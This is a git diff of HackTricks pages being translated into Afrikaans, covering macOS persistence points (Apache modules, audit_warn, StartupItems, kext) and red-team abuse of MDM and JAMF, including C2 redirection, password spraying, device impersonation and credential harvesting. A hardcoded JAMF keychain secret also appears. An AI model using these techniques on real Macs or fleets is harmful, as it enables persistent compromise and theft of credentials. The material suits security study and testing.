have entitlements +* Nuttig om sandbox te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy moet root wees en apache moet loop +* TCC omseiling: [🔴](https://emojipedia.org/large-red-circle) +* Httpd het nie toestemmings nie -#### Location +#### Plek * **`/etc/apache2/httpd.conf`** - * Root required - * Trigger: When Apache2 is started +* Root nodig +* Trigger: Wanneer Apache2 begin -#### Description & Exploit +#### Beskrywing & Exploit -You can indicate in `/etc/apache2/httpd.conf` to load a module adding a line such as: +Jy kan in `/etc/apache2/httpd.conf` aandui om 'n module te laai deur 'n lyn soos die volgende by te voeg: {% code overflow="wrap" %} ```bash @@ -1481,16 +1424,13 @@ LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority" ``` {% endcode %} -This way your compiled moduled will be loaded by Apache. The only thing is that either you need to **sign it with a valid Apple certificate**, or you need to **add a new trusted certificate** in the system and **sign it** with it. - -Then, if needed , to make sure the server will be started you could execute: +Op hierdie manier sal jou saamgestelde modules deur Apache gelaai word. Die enigste ding is dat jy dit óf met 'n geldige Apple-sertifikaat moet **onderteken**, óf jy moet 'n nuwe vertroude sertifikaat in die stelsel **byvoeg** en dit daarmee **onderteken**. +Dan, indien nodig, kan jy verseker dat die bediener gestart sal word deur die volgende uit te voer: ```bash sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist ``` - -Code example for the Dylb: - +Kodevoorbeeld vir die Dylb: ```objectivec #include #include @@ -1498,47 +1438,44 @@ Code example for the Dylb: __attribute__((constructor)) static void myconstructor(int argc, const char **argv) { - printf("[+] dylib constructor called from %s\n", argv[0]); - syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]); +printf("[+] dylib constructor called from %s\n", argv[0]); +syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]); } ``` - -### BSM audit framework +### BSM ouditraamwerk Writeup: [https://theevilbit.github.io/beyond/beyond\_0031/](https://theevilbit.github.io/beyond/beyond\_0031/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you need to be root, auditd be running and cause a warning -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om die sandboks te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy moet root wees, auditd moet loop en 'n waarskuwing veroorsaak +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Plek * **`/etc/security/audit_warn`** - * Root required - * **Trigger**: When auditd detects a warning +* Root vereis +* **Trigger**: Wanneer auditd 'n waarskuwing opspoor -#### Description & Exploit - -Whenever auditd detects a warning the script **`/etc/security/audit_warn`** is **executed**. So you could add your payload on it. +#### Beskrywing & Uitbuiting +Telkens wanneer auditd 'n waarskuwing opspoor, word die skripsie **`/etc/security/audit_warn`** **uitgevoer**. Jy kan dus jou lading daarby voeg. ```bash echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn ``` +Jy kan 'n waarskuwing afdwing met `sudo audit -n`. -You could force a warning with `sudo audit -n`. - -### Startup Items +### Begin Items {% hint style="danger" %} -**This is deprecated, so nothing should be found in those directories.** +**Dit is verouderd, so daar behoort niks in daardie gids te wees nie.** {% endhint %} -The **StartupItem** is a directory that should be positioned within either `/Library/StartupItems/` or `/System/Library/StartupItems/`. Once this directory is established, it must encompass two specific files: +Die **StartupItem** is 'n gids wat binne `/Library/StartupItems/` of `/System/Library/StartupItems/` geplaas moet word. Sodra hierdie gids gevestig is, moet dit twee spesifieke lêers bevat: -1. An **rc script**: A shell script executed at startup. -2. A **plist file**, specifically named `StartupParameters.plist`, which contains various configuration settings. +1. 'n **rc-skrip**: 'n skulpskrip wat by begin uitgevoer word. +2. 'n **plist-lêer**, spesifiek genoem `StartupParameters.plist`, wat verskeie konfigurasie-instellings bevat. -Ensure that both the rc script and the `StartupParameters.plist` file are correctly placed inside the **StartupItem** directory for the startup process to recognize and utilize them. +Maak seker dat beide die rc-skrip en die `StartupParameters.plist`-lêer korrek binne die **StartupItem**-gids geplaas word sodat die beginproses dit kan herken en gebruik. {% tabs %} @@ -1548,34 +1485,32 @@ Ensure that both the rc script and the `StartupParameters.plist` file are correc - Description - This is a description of this service - OrderPreference - None - Provides - - superservicename - +Description +This is a description of this service +OrderPreference +None +Provides + +superservicename + ``` -{% endtab %} - -{% tab title="superservicename" %} +{% tab title="superservisenaam" %} ```bash #!/bin/sh . /etc/rc.common StartService(){ - touch /tmp/superservicestarted +touch /tmp/superservicestarted } StopService(){ - rm /tmp/superservicestarted +rm /tmp/superservicestarted } RestartService(){ - echo "Restarting" +echo "Restarting" } RunService "$1" @@ -1586,51 +1521,47 @@ RunService "$1" ### ~~emond~~ {% hint style="danger" %} -I cannot find this component in my macOS so for more info check the writeup +Ek kan hierdie komponent nie in my macOS vind nie, so vir meer inligting kyk na die writeup {% endhint %} Writeup: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/) -Introduced by Apple, **emond** is a logging mechanism that seems to be underdeveloped or possibly abandoned, yet it remains accessible. While not particularly beneficial for a Mac administrator, this obscure service could serve as a subtle persistence method for threat actors, likely unnoticed by most macOS admins. - -For those aware of its existence, identifying any malicious usage of **emond** is straightforward. The system's LaunchDaemon for this service seeks scripts to execute in a single directory. To inspect this, the following command can be used: +Deur Apple geïntroduceer, is **emond** 'n log-meganisme wat lyk asof dit onderontwikkel is of moontlik verlate is, maar dit bly toeganklik. Alhoewel dit nie besonders voordelig is vir 'n Mac-administrator nie, kan hierdie obskure diens dien as 'n subtiele volhardingsmetode vir dreigingsakteurs, moontlik onopgemerk deur die meeste macOS-administrateurs. +Vir diegene wat bewus is van sy bestaan, is dit maklik om enige skadelike gebruik van **emond** te identifiseer. Die stelsel se LaunchDaemon vir hierdie diens soek skripte om uit te voer in 'n enkele gids. Om dit te ondersoek, kan die volgende opdrag gebruik word: ```bash ls -l /private/var/db/emondClients ``` - - ### ~~XQuartz~~ Writeup: [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/) -#### Location +#### Plek * **`/opt/X11/etc/X11/xinit/privileged_startx.d`** - * Root required - * **Trigger**: With XQuartz +* Root vereis +* **Trigger**: Met XQuartz -#### Description & Exploit +#### Beskrywing & Exploit -XQuartz is **no longer installed in macOS**, so if you want more info check the writeup. +XQuartz is **nie meer geïnstalleer in macOS nie**, so as jy meer inligting wil hê, kyk na die writeup. ### ~~kext~~ {% hint style="danger" %} -It's so complicated to install kext even as root taht I won't consider this to escape from sandboxes or even for persistence (unless you have an exploit) +Dit is so ingewikkeld om kext te installeer, selfs as root, dat ek dit nie sal oorweeg om uit sandbokse te ontsnap of selfs vir volharding nie (tensy jy 'n uitbuiting het) {% endhint %} -#### Location +#### Plek -In order to install a KEXT as a startup item, it needs to be **installed in one of the following locations**: +Om 'n KEXT as 'n opstartitem te installeer, moet dit **geïnstalleer word in een van die volgende plekke**: * `/System/Library/Extensions` - * KEXT files built into the OS X operating system. +* KEXT-lêers wat in die OS X-bedryfstelsel ingebou is. * `/Library/Extensions` - * KEXT files installed by 3rd party software - -You can list currently loaded kext files with: +* KEXT-lêers wat deur derdeparty-programmatuur geïnstalleer is +Jy kan tans gelaai kext-lêers lys met: ```bash kextstat #List loaded kext kextload /path/to/kext.kext #Load a new one based on path @@ -1638,46 +1569,44 @@ kextload -b com.apple.driver.ExampleBundle #Load a new one based on path kextunload /path/to/kext.kext kextunload -b com.apple.driver.ExampleBundle ``` - -For more information about [**kernel extensions check this section**](macos-security-and-privilege-escalation/mac-os-architecture/#i-o-kit-drivers). +Vir meer inligting oor [**kernel-uitbreidings, sien hierdie afdeling**](macos-security-and-privilege-escalation/mac-os-architecture/#i-o-kit-drivers). ### ~~amstoold~~ Writeup: [https://theevilbit.github.io/beyond/beyond\_0029/](https://theevilbit.github.io/beyond/beyond\_0029/) -#### Location +#### Ligging * **`/usr/local/bin/amstoold`** - * Root required +* Root vereis -#### Description & Exploitation +#### Beskrywing & Uitbuiting -Apparently the `plist` from `/System/Library/LaunchAgents/com.apple.amstoold.plist` was using this binary while exposing a XPC service... the thing is that the binary didn't exist, so you could place something there and when the XPC service gets called your binary will be called. +Blykbaar het die `plist` vanaf `/System/Library/LaunchAgents/com.apple.amstoold.plist` hierdie binaêre gebruik terwyl dit 'n XPC-diens blootgestel het... die ding is dat die binaêre nie bestaan het nie, so jy kon iets daar plaas en wanneer die XPC-diens geroep word, sal jou binaêre geroep word. -I can no longer find this in my macOS. +Ek kan dit nie meer in my macOS vind nie. ### ~~xsanctl~~ Writeup: [https://theevilbit.github.io/beyond/beyond\_0015/](https://theevilbit.github.io/beyond/beyond\_0015/) -#### Location +#### Ligging * **`/Library/Preferences/Xsan/.xsanrc`** - * Root required - * **Trigger**: When the service is run (rarely) +* Root vereis +* **Trigger**: Wanneer die diens uitgevoer word (seldsaam) -#### Description & exploit +#### Beskrywing & uitbuiting -Apparently it's not very common to run this script and I couldn't even find it in my macOS, so if you want more info check the writeup. +Blykbaar is dit nie baie algemeen om hierdie skrip uit te voer nie en ek kon dit selfs nie in my macOS vind nie, so as jy meer inligting wil hê, kyk na die writeup. ### ~~/etc/rc.common~~ {% hint style="danger" %} -**This isn't working in modern MacOS versions** +**Dit werk nie in moderne MacOS-weergawes nie** {% endhint %} -It's also possible to place here **commands that will be executed at startup.** Example os regular rc.common script: - +Dit is ook moontlik om hier **opdragte te plaas wat by opstart uitgevoer sal word.** Voorbeeld van 'n gewone rc.common-skrip: ```bash # # Common setup for startup scripts. @@ -1717,16 +1646,16 @@ PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; ex # CheckForNetwork() { - local test +local test - if [ -z "${NETWORKUP:=}" ]; then - test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l) - if [ "${test}" -gt 0 ]; then - NETWORKUP="-YES-" - else - NETWORKUP="-NO-" - fi - fi +if [ -z "${NETWORKUP:=}" ]; then +test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l) +if [ "${test}" -gt 0 ]; then +NETWORKUP="-YES-" +else +NETWORKUP="-NO-" +fi +fi } alias ConsoleMessage=echo @@ -1736,25 +1665,25 @@ alias ConsoleMessage=echo # GetPID () { - local program="$1" - local pidfile="${PIDFILE:=/var/run/${program}.pid}" - local pid="" +local program="$1" +local pidfile="${PIDFILE:=/var/run/${program}.pid}" +local pid="" - if [ -f "${pidfile}" ]; then - pid=$(head -1 "${pidfile}") - if ! kill -0 "${pid}" 2> /dev/null; then - echo "Bad pid file $pidfile; deleting." - pid="" - rm -f "${pidfile}" - fi - fi +if [ -f "${pidfile}" ]; then +pid=$(head -1 "${pidfile}") +if ! kill -0 "${pid}" 2> /dev/null; then +echo "Bad pid file $pidfile; deleting." +pid="" +rm -f "${pidfile}" +fi +fi - if [ -n "${pid}" ]; then - echo "${pid}" - return 0 - else - return 1 - fi +if [ -n "${pid}" ]; then +echo "${pid}" +return 0 +else +return 1 +fi } # @@ -1762,30 +1691,29 @@ GetPID () # RunService () { - case $1 in - start ) StartService ;; - stop ) StopService ;; - restart) RestartService ;; - * ) echo "$0: unknown argument: $1";; - esac +case $1 in +start ) StartService ;; +stop ) StopService ;; +restart) RestartService ;; +* ) echo "$0: unknown argument: $1";; +esac } ``` - -## Persistence techniques and tools +## Volhardingstegnieke en -gereedskap * [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift) * [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md index 9d17b9456..fde176cf7 100644 --- a/macos-hardening/macos-red-teaming/README.md +++ b/macos-hardening/macos-red-teaming/README.md @@ -1,88 +1,86 @@ -# macOS Red Teaming +# macOS Rooi-span
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Abusing MDMs +## MDM-misbruik * JAMF Pro: `jamf checkJSSConnection` * Kandji -If you manage to **compromise admin credentials** to access the management platform, you can **potentially compromise all the computers** by distributing your malware in the machines. +As jy daarin slaag om **administratiewe legitimasie te kompromitteer** om toegang tot die bestuursplatform te verkry, kan jy **moontlik alle rekenaars kompromitteer** deur jou kwaadwillige sagteware op die masjiene te versprei. -For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work: +Vir rooi-spanning in MacOS-omgewings word dit sterk aanbeveel om 'n basiese begrip van hoe die MDM's werk te hê: {% content-ref url="macos-mdm/" %} [macos-mdm](macos-mdm/) {% endcontent-ref %} -### Using MDM as a C2 +### MDM gebruik as 'n C2 -A MDM will have permission to install, query or remove profiles, install applications, create local admin accounts, set firmware password, change the FileVault key... +'n MDM het toestemming om profiele te installeer, navrae te doen of te verwyder, programme te installeer, plaaslike administrateursrekeninge te skep, firmware-wagwoord te stel, die FileVault-sleutel te verander... -In order to run your own MDM you need to **your CSR signed by a vendor** which you could try to get with [**https://mdmcert.download/**](https://mdmcert.download/). And to run your own MDM for Apple devices you could use [**MicroMDM**](https://github.com/micromdm/micromdm). +Om jou eie MDM te laat loop, moet jy **jou CSR deur 'n verskaffer laat onderteken** wat jy kan probeer kry met [**https://mdmcert.download/**](https://mdmcert.download/). En om jou eie MDM vir Apple-toestelle te laat loop, kan jy [**MicroMDM**](https://github.com/micromdm/micromdm) gebruik. -However, to install an application in an enrolled device, you still need it to be signed by a developer account... however, upon MDM enrolment the **device adds the SSL cert of the MDM as a trusted CA**, so you can now sign anything. +Om egter 'n toepassing op 'n ingeskryfde toestel te installeer, moet dit steeds deur 'n ontwikkelaarsrekening onderteken word... maar met MDM-inskrywing voeg die **toestel die SSL-sertifikaat van die MDM as 'n vertroude CA by**, sodat jy nou enigiets kan onderteken. -To enrol the device in a MDM you. need to install a **`mobileconfig`** file as root, which could be delivered via a **pkg** file (you could compress it in zip and when downloaded from safari it will be decompressed). +Om die toestel in 'n MDM in te skryf, moet jy 'n **`mobileconfig`**-lêer as root installeer, wat afgelewer kan word deur 'n **pkg**-lêer (jy kan dit in 'n zip-komprimeer en wanneer dit vanaf Safari afgelaai word, sal dit gedekomprimeer word). -**Mythic agent Orthrus** uses this technique. +**Mythic-agent Orthrus** gebruik hierdie tegniek. -### Abusing JAMF PRO +### JAMF PRO-misbruik -JAMF can run **custom scripts** (scripts developed by the sysadmin), **native payloads** (local account creation, set EFI password, file/process monitoring...) and **MDM** (device configurations, device certificates...). +JAMF kan **aangepaste skripte** (skripte wat deur die stelseladministrateur ontwikkel is), **inheemse ladinge** (skep van plaaslike rekeninge, stel EFI-wagwoord, lêer-/prosesmonitering...) en **MDM** (toestelkonfigurasies, toestelsertifikate...) uitvoer. -#### JAMF self-enrolment +#### JAMF selfinskrywing -Go to a page such as `https://.jamfcloud.com/enroll/` to see if they have **self-enrolment enabled**. If they have it might **ask for credentials to access**. +Gaan na 'n bladsy soos `https://.jamfcloud.com/enroll/` om te sien of hulle **selfinskrywing geaktiveer** het. As hulle dit het, kan dit **vra vir legitimasie om toegang te verkry**. -You could use the script [**JamfSniper.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfSniper.py) to perform a password spraying attack. +Jy kan die skrip [**JamfSniper.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfSniper.py) gebruik om 'n wagwoordspuitaanval uit te voer. -Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form: +Verder, nadat jy die regte legitimasie gevind het, kan jy moontlik ander gebruikersname met die volgende vorm deur kragtige kragtige aanvalle aanval: ![](<../../.gitbook/assets/image (7) (1) (1).png>) -#### JAMF device Authentication +#### JAMF-toestelverifikasie
-The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\ -Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`** +Die **`jamf`** binêre lêer bevat die geheim om die sleutelketting oop te maak wat op daardie tydstip **gedeel** was onder almal en dit was: **`jk23ucnq91jfu9aj`**.\ +Verder volharder jamf as 'n **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`** -#### JAMF Device Takeover +#### JAMF-toesteloorgawe -The **JSS** (Jamf Software Server) **URL** that **`jamf`** will use is located in **`/Library/Preferences/com.jamfsoftware.jamf.plist`**.\ -This file basically contains the URL: +Die **JSS** (Jamf Software Server) **URL** wat **`jamf`** sal gebruik, is geleë in **`/Library/Preferences/com.jamfsoftware.jamf.plist`**.\ +Hierdie lêer bevat basies die URL: {% code overflow="wrap" %} ```bash plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist [...] - is_virtual_machine - - jss_url - https://halbornasd.jamfcloud.com/ - last_management_framework_change_id - 4 +is_virtual_machine + +jss_url +https://halbornasd.jamfcloud.com/ +last_management_framework_change_id +4 [...] ``` {% endcode %} -So, an attacker could drop a malicious package (`pkg`) that **overwrites this file** when installed setting the **URL to a Mythic C2 listener from a Typhon agent** to now be able to abuse JAMF as C2. - -{% code overflow="wrap" %} +So, 'n aanvaller kan 'n skadelike pakkie (`pkg`) laat val wat **hierdie lêer oorskryf** wanneer dit geïnstalleer word en die **URL instel op 'n Mythic C2 luisteraar van 'n Typhon-agent** om nou JAMF te misbruik as C2. ```bash # After changing the URL you could wait for it to be reloaded or execute: sudo jamf policy -id 0 @@ -93,34 +91,34 @@ sudo jamf policy -id 0 #### JAMF Impersonation -In order to **impersonate the communication** between a device and JMF you need: +Om die kommunikasie tussen 'n toestel en JMF na te boots, benodig jy die volgende: -* The **UUID** of the device: `ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'` -* The **JAMF keychain** from: `/Library/Application\ Support/Jamf/JAMF.keychain` which contains the device certificate +* Die **UUID** van die toestel: `ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'` +* Die **JAMF-sleutelbos** vanaf: `/Library/Application\ Support/Jamf/JAMF.keychain` wat die toestelsertifikaat bevat -With this information, **create a VM** with the **stolen** Hardware **UUID** and with **SIP disabled**, drop the **JAMF keychain,** **hook** the Jamf **agent** and steal its information. +Met hierdie inligting, **skep 'n VM** met die **gesteelde** Hardeware **UUID** en met **SIP gedeaktiveer**, laat die **JAMF-sleutelbos val**, **haak** die Jamf **agent** en steel sy inligting. -#### Secrets stealing +#### Geheimhouding steel

a

-You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**. +Jy kan ook die ligging `/Library/Application Support/Jamf/tmp/` monitor vir die **aangepaste skripte** wat administrateurs dalk wil uitvoer via Jamf aangesien hulle hier **geplaas, uitgevoer en verwyder** word. Hierdie skripte **kan geloofsbriewe bevat**. -However, **credentials** might be passed tho these scripts as **parameters**, so you would need to monitor `ps aux | grep -i jamf` (without even being root). +Nietemin, **geloofsbriewe** kan aan hierdie skripte oorgedra word as **parameters**, dus sal jy `ps aux | grep -i jamf` moet monitor (sonder om selfs root te wees). -The script [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py) can listen for new files being added and new process arguments. +Die skrip [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py) kan luister vir nuwe lêers wat bygevoeg word en nuwe prosesargumente. -### macOS Remote Access +### macOS Afstandsbediening -And also about **MacOS** "special" **network** **protocols**: +En ook oor **MacOS** "spesiale" **netwerkprotokolle**: {% content-ref url="../macos-security-and-privilege-escalation/macos-protocols.md" %} [macos-protocols.md](../macos-security-and-privilege-escalation/macos-protocols.md) {% endcontent-ref %} -## Active Directory +## Aktiewe Gids -In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages: +In sommige gevalle sal jy vind dat die **MacOS-rekenaar aan 'n AD gekoppel is**. In hierdie scenario moet jy probeer om die aktiewe gids soos jy gewoond is te **opnoem**. Vind 'n bietjie **hulp** in die volgende bladsye: {% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %} [pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md) @@ -134,41 +132,36 @@ In some occasions you will find that the **MacOS computer is connected to an AD* [pentesting-kerberos-88](../../network-services-pentesting/pentesting-kerberos-88/) {% endcontent-ref %} -Some **local MacOS tool** that may also help you is `dscl`: - +Sommige **plaaslike MacOS-hulpmiddels** wat jou ook kan help, is `dscl`: ```bash dscl "/Active Directory/[Domain]/All Domains" ls / ``` +Daar is ook 'n paar gereedgemaakte hulpmiddels vir MacOS om outomaties die AD te ondersoek en met kerberos te speel: -Also there are some tools prepared for MacOS to automatically enumerate the AD and play with kerberos: - -* [**Machound**](https://github.com/XMCyber/MacHound): MacHound is an extension to the Bloodhound audting tool allowing collecting and ingesting of Active Directory relationships on MacOS hosts. -* [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost is an Objective-C project designed to interact with the Heimdal krb5 APIs on macOS. The goal of the project is to enable better security testing around Kerberos on macOS devices using native APIs without requiring any other framework or packages on the target. -* [**Orchard**](https://github.com/its-a-feature/Orchard): JavaScript for Automation (JXA) tool to do Active Directory enumeration. - -### Domain Information +* [**Machound**](https://github.com/XMCyber/MacHound): MacHound is 'n uitbreiding van die Bloodhound ouditeringshulpmiddel wat die insameling en opname van Active Directory-verhoudings op MacOS-gashere moontlik maak. +* [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost is 'n Objective-C-projek wat ontwerp is om met die Heimdal krb5 API's op macOS te kommunikeer. Die doel van die projek is om beter sekuriteitstoetsing rondom Kerberos op macOS-toestelle moontlik te maak deur gebruik te maak van inheemse API's sonder om enige ander raamwerk of pakkette op die teiken te vereis. +* [**Orchard**](https://github.com/its-a-feature/Orchard): JavaScript vir Automatisering (JXA) hulpmiddel vir Active Directory-ondersoek. +### Domein Inligting ```bash echo show com.apple.opendirectoryd.ActiveDirectory | scutil ``` +### Gebruikers -### Users +Die drie tipes MacOS-gebruikers is: -The three types of MacOS users are: +* **Plaaslike Gebruikers** - Bestuur deur die plaaslike OpenDirectory-diens, hulle is op geen manier gekoppel aan die Aktiewe Gids nie. +* **Netwerkgebruikers** - Vlugtige Aktiewe Gids-gebruikers wat 'n verbinding met die DC-bediener benodig om te verifieer. +* **Mobiele Gebruikers** - Aktiewe Gids-gebruikers met 'n plaaslike rugsteun vir hul geloofsbriewe en lêers. -* **Local Users** — Managed by the local OpenDirectory service, they aren’t connected in any way to the Active Directory. -* **Network Users** — Volatile Active Directory users who require a connection to the DC server to authenticate. -* **Mobile Users** — Active Directory users with a local backup for their credentials and files. +Die plaaslike inligting oor gebruikers en groepe word gestoor in die map _/var/db/dslocal/nodes/Default._\ +Byvoorbeeld, die inligting oor 'n gebruiker genaamd _mark_ word gestoor in _/var/db/dslocal/nodes/Default/users/mark.plist_ en die inligting oor die groep _admin_ is in _/var/db/dslocal/nodes/Default/groups/admin.plist_. -The local information about users and groups is stored in in the folder _/var/db/dslocal/nodes/Default._\ -For example, the info about user called _mark_ is stored in _/var/db/dslocal/nodes/Default/users/mark.plist_ and the info about the group _admin_ is in _/var/db/dslocal/nodes/Default/groups/admin.plist_. - -In addition to using the HasSession and AdminTo edges, **MacHound adds three new edges** to the Bloodhound database: - -* **CanSSH** - entity allowed to SSH to host -* **CanVNC** - entity allowed to VNC to host -* **CanAE** - entity allowed to execute AppleEvent scripts on host +Bo en behalwe die gebruik van die HasSession en AdminTo-lyne, **voeg MacHound drie nuwe lyne by** tot die Bloodhound-databasis: +* **CanSSH** - entiteit wat toegelaat word om SSH na gasheer te maak +* **CanVNC** - entiteit wat toegelaat word om VNC na gasheer te maak +* **CanAE** - entiteit wat toegelaat word om AppleEvent-skripsies op gasheer uit te voer ```bash #User enumeration dscl . ls /Users @@ -190,30 +183,29 @@ dscl "/Active Directory/TEST/All Domains" read "/Groups/[groupname]" #Domain Information dsconfigad -show ``` +Meer inligting in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/) -More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/) +## Toegang tot die Sleutelbos -## Accessing the Keychain - -The Keychain highly probably contains sensitive information that if accessed withuot generating a prompt could help to move forward a red team exercise: +Die Sleutelbos bevat hoogstwaarskynlik sensitiewe inligting wat, as dit sonder 'n vraag gegenereer word, kan help om 'n rooi-span-oefening voort te sit: {% content-ref url="macos-keychain.md" %} [macos-keychain.md](macos-keychain.md) {% endcontent-ref %} -## External Services +## Eksterne Dienste -MacOS Red Teaming is different from a regular Windows Red Teaming as usually **MacOS is integrated with several external platforms directly**. A common configuration of MacOS is to access to the computer using **OneLogin synchronised credentials, and accessing several external services** (like github, aws...) via OneLogin. +MacOS Red Teaming verskil van 'n gewone Windows Red Teaming omdat gewoonlik **MacOS geïntegreer is met verskeie eksterne platforms direk**. 'n Gewone konfigurasie van MacOS is om toegang tot die rekenaar te verkry deur gebruik te maak van **OneLogin-gesinkroniseerde geloofsbriewe en toegang tot verskeie eksterne dienste** (soos github, aws...) via OneLogin. -## Misc Red Team techniques +## Verskeie Red Team-tegnieke ### Safari -When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed: +Wanneer 'n lêer in Safari afgelaai word, sal dit as dit 'n "veilige" lêer is, **outomaties oopgemaak** word. So byvoorbeeld, as jy 'n zip aflaai, sal dit outomaties gedekomprimeer word:
